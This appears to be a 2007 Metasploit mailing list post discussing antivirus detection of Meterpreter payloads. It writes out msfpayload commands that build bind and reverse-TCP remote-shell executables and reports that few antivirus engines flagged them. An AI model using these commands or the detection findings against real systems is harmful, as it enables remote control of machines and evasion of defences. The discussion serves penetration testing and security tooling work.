Metasploit mailing list archives
Connect to a remote windows host with valid credentials (no exploit)
From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 1 Jun 2007 15:13:01 -0500
On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is launched (warning about "Buffer Overflow"); Kaspersky does a good job on this, I am positively surprised.
I made a meterpreter listener and reverse and uploaded them to virustotal.com:

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe

Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10 used to complain, not sure what changed. :)

If only a clean EXE would be created with a real exit() call or something. Having the debug handler kick in after doing a 'quit' really sucks.

--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."